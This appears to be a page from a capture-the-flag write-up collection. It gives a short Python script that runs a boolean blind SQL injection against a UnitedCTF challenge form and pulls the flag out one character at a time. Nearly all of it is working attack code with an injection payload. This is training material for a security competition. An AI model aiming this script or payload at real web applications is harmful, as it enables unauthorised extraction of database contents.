Blind SQLi

from requests import get,post,Session
from string import printable

url = "http://challenges.unitedctf.ca:18000/challenge3.php"

good = "Votre requête a retourné au moins un résultat"
flag = [''] * 100
char_found = 0
no_char_found = 0
with Session() as s:
  while True:
    for char in printable:
      data = {}
      data["flagID"] = f"' or substring(flag,{char_found + 1},1) = '{char}' COLLATE utf8mb4_bin#"

      if good in s.post(url,data=data).text:
        flag[char_found] = char
        char_found += 1
        break
      print(''.join(flag)+char,end="\r")
    if len(''.join(flag)) == 60:
      print(''.join(flag),end="\r\n")
      break
PreviousTime-Based SQLiNextPicoCTF

Last updated

Was this helpful?